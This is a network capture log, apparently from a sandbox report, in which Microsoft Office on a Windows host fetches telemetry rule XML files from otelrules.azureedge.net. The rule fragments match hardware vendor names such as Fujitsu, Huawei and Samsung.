                                Content-Type: text/xml
                                Content-Length: 477
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                ETag: "0x8DC582BB8CEAC16"
                                x-ms-request-id: fb105ca9-d01e-002b-5b00-4425fb000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165117Z-174f7845968glpgnhC1EWR7uec00000016b000000000htc0
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:17 UTC | 477 | IN | Data:
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                23 | 192.168.2.5 | 49990 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:17 UTC | 192 | OUT | GET /rules/rule120623v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:17 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:17 GMT
                                Content-Type: text/xml
                                Content-Length: 464
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                ETag: "0x8DC582B97FB6C3C"
                                x-ms-request-id: 0e02d283-301e-000c-5b32-44323f000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165117Z-174f7845968psccphC1EWRuz9s00000016cg00000000pr5d
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:17 UTC | 464 | IN | Data:
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                24 | 192.168.2.5 | 49991 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:17 UTC | 192 | OUT | GET /rules/rule120624v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:17 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:17 GMT
                                Content-Type: text/xml
                                Content-Length: 494
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                ETag: "0x8DC582BB7010D66"
                                x-ms-request-id: 1f40cf70-d01e-0014-6550-41ed58000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165117Z-174f7845968vqt9xhC1EWRgten000000166000000000q1ns
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:17 UTC | 494 | IN | Data:
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                25 | 192.168.2.5 | 49992 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:18 UTC | 192 | OUT | GET /rules/rule120625v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:19 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:19 GMT
                                Content-Type: text/xml
                                Content-Length: 419
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                ETag: "0x8DC582B9748630E"
                                x-ms-request-id: e044a7be-f01e-003c-0c76-438cf0000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165119Z-174f784596886s2bhC1EWR743w00000016b0000000001s6c
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:19 UTC | 419 | IN | Data:
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                26 | 192.168.2.5 | 49993 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:19 UTC | 192 | OUT | GET /rules/rule120626v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:19 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:19 GMT
                                Content-Type: text/xml
                                Content-Length: 472
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                ETag: "0x8DC582B9DACDF62"
                                x-ms-request-id: 264c510b-001e-000b-0eb2-4215a7000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165119Z-174f7845968kvnqxhC1EWRmf3g0000000syg00000000n63s
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:19 UTC | 472 | IN | Data:
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                27 | 192.168.2.5 | 49994 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:19 UTC | 192 | OUT | GET /rules/rule120627v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:19 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:19 GMT
                                Content-Type: text/xml
                                Content-Length: 404
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                ETag: "0x8DC582B9E8EE0F3"
                                x-ms-request-id: f5c4af5a-301e-005d-6385-3fe448000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165119Z-174f78459688l8rvhC1EWRtzr00000000kt000000000gdg4
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:19 UTC | 404 | IN | Data:
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                28 | 192.168.2.5 | 49996 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:20 UTC | 192 | OUT | GET /rules/rule120628v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:20 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:20 GMT
                                Content-Type: text/xml
                                Content-Length: 468
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                ETag: "0x8DC582B9C8E04C8"
                                x-ms-request-id: 5181e575-b01e-001e-206f-430214000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165120Z-174f784596886s2bhC1EWR743w000000164000000000uub1
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:20 UTC | 468 | IN | Data:
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                29 | 192.168.2.5 | 49995 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:20 UTC | 192 | OUT | GET /rules/rule120629v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:20 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:20 GMT
                                Content-Type: text/xml
                                Content-Length: 428
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                ETag: "0x8DC582BAC4F34CA"
                                x-ms-request-id: b254496e-901e-0016-2991-3fefe9000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165120Z-174f7845968cpnpfhC1EWR3afc00000015s000000000qq7k
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:20 UTC | 428 | IN | Data:
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                30 | 192.168.2.5 | 49997 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:21 UTC | 192 | OUT | GET /rules/rule120630v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:21 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:21 GMT
                                Content-Type: text/xml
                                Content-Length: 499
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                ETag: "0x8DC582B98CEC9F6"
                                x-ms-request-id: 98fcde7c-201e-0096-4eef-44ace6000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165121Z-174f7845968n2hr8hC1EWR9cag00000015wg000000008uae
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:21 UTC | 499 | IN | Data:
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                31 | 192.168.2.5 | 49998 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:21 UTC | 192 | OUT | GET /rules/rule120631v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:21 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:21 GMT
                                Content-Type: text/xml
                                Content-Length: 415
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                ETag: "0x8DC582B988EBD12"
                                x-ms-request-id: 5aec2b48-201e-0085-7d6b-4334e3000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165121Z-174f7845968jrjrxhC1EWRmmrs000000168g00000000pa15
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:21 UTC | 415 | IN | Data:
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                32 | 192.168.2.5 | 49999 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:21 UTC | 192 | OUT | GET /rules/rule120632v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:22 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:22 GMT
                                Content-Type: text/xml
                                Content-Length: 471
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                ETag: "0x8DC582BB5815C4C"
                                x-ms-request-id: e7678828-401e-0078-7a85-434d34000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165122Z-174f7845968px8v7hC1EWR08ng00000016f000000000dcme
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:22 UTC | 471 | IN | Data:
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                33 | 192.168.2.5 | 50000 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:22 UTC | 192 | OUT | GET /rules/rule120633v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:22 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:22 GMT
                                Content-Type: text/xml
                                Content-Length: 419
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                ETag: "0x8DC582BB32BB5CB"
                                x-ms-request-id: 2132beec-901e-00ac-46aa-42b69e000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165122Z-174f78459685m244hC1EWRgp2c000000160000000000k5p5
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:22 UTC | 419 | IN | Data:
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                34 | 192.168.2.5 | 50001 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:22 UTC | 192 | OUT | GET /rules/rule120634v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:22 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:22 GMT
                                Content-Type: text/xml
                                Content-Length: 494
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                ETag: "0x8DC582BB8972972"
                                x-ms-request-id: 1e31e9ea-701e-0098-028a-43395f000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165122Z-174f7845968cpnpfhC1EWR3afc00000015u000000000et6k
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:22 UTC | 494 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                35 | 192.168.2.5 | 50002 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:23 UTC | 192 | OUT | GET /rules/rule120635v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:23 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:23 GMT
                                Content-Type: text/xml
                                Content-Length: 420
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                ETag: "0x8DC582B9DAE3EC0"
                                x-ms-request-id: d3507608-601e-003d-4b91-3f6f25000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165123Z-174f7845968ljs8phC1EWRe6en00000015zg00000000q9va
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:23 UTC | 420 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                36 | 192.168.2.5 | 50003 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:23 UTC | 192 | OUT | GET /rules/rule120636v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:24 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:24 GMT
                                Content-Type: text/xml
                                Content-Length: 472
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                ETag: "0x8DC582B9D43097E"
                                x-ms-request-id: dc0e5a4e-901e-005b-0191-3f2005000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165123Z-174f7845968xr5c2hC1EWRd0hn0000000r2000000000cfhu
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:24 UTC | 472 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                37 | 192.168.2.5 | 50004 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:24 UTC | 192 | OUT | GET /rules/rule120637v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:24 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:24 GMT
                                Content-Type: text/xml
                                Content-Length: 427
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                ETag: "0x8DC582BA909FA21"
                                x-ms-request-id: 5810d2d2-301e-0000-6891-3feecc000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165124Z-174f7845968swgbqhC1EWRmnb400000016f0000000000pgp
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:24 UTC | 427 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                38 | 192.168.2.5 | 50005 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:24 UTC | 192 | OUT | GET /rules/rule120638v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:25 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:24 GMT
                                Content-Type: text/xml
                                Content-Length: 486
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                ETag: "0x8DC582B92FCB436"
                                x-ms-request-id: fac497c4-501e-008f-4391-3f9054000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165124Z-174f7845968kvnqxhC1EWRmf3g0000000sw000000000xbf5
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:25 UTC | 486 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                39 | 192.168.2.5 | 50006 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:24 UTC | 192 | OUT | GET /rules/rule120639v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:25 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:24 GMT
                                Content-Type: text/xml
                                Content-Length: 423
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                ETag: "0x8DC582BB7564CE8"
                                x-ms-request-id: dc0e6055-901e-005b-2d91-3f2005000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165124Z-174f7845968ljs8phC1EWRe6en00000015y000000000ufxf
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:25 UTC | 423 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                40 | 192.168.2.5 | 50007 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:25 UTC | 192 | OUT | GET /rules/rule120640v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:26 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:25 GMT
                                Content-Type: text/xml
                                Content-Length: 478
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                ETag: "0x8DC582B9B233827"
                                x-ms-request-id: ef6d0e99-401e-0067-3dc7-4309c2000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165125Z-174f78459685726chC1EWRsnbg000000165000000000tg0x
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:26 UTC | 478 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                41 | 192.168.2.5 | 50008 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:26 UTC | 192 | OUT | GET /rules/rule120641v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:26 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:26 GMT
                                Content-Type: text/xml
                                Content-Length: 404
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                ETag: "0x8DC582B95C61A3C"
                                x-ms-request-id: 50a9aa5a-901e-0015-37fe-41b284000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165126Z-174f78459685m244hC1EWRgp2c00000015z000000000r536
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:26 UTC | 404 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                42 | 192.168.2.5 | 50009 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:26 UTC | 192 | OUT | GET /rules/rule120642v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:26 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:26 GMT
                                Content-Type: text/xml
                                Content-Length: 468
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                ETag: "0x8DC582BB046B576"
                                x-ms-request-id: be7987d0-001e-0034-1e91-3fdd04000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165126Z-174f7845968psccphC1EWRuz9s00000016fg00000000ahfv
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
